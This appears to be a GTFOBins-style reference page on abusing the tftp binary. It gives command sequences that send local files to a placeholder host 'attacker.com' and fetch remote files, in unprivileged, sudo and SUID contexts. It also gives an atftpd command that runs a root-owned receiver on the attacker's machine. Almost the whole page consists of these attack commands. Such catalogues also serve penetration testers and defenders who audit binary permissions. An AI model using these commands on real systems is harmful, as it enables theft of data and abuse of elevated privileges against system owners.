.. / tftp

Sponsor Fork Star

• Upload
• Download

Upload

This executable can upload local data.

• Unprivileged

  This function can be performed by any unprivileged user.

  tftp attacker.com
  put /path/to/input-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  tftp attacker.com
  put /path/to/input-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  tftp attacker.com
  put /path/to/input-file

  Receiver

  A TFTP server can be used on the attacker box to receive the data.

  atftpd --no-fork --verbose --daemon --no-fork --user root.root .

Download

This executable can download remote data.

• Unprivileged

  This function can be performed by any unprivileged user.

  tftp attacker.com
  get /path/to/input-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  tftp attacker.com
  get /path/to/input-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  tftp attacker.com
  get /path/to/input-file

  Sender

  A TFTP server can be used on the attacker box to send the data.

  atftpd --no-fork --verbose --daemon --no-fork --user root.root .

Source | History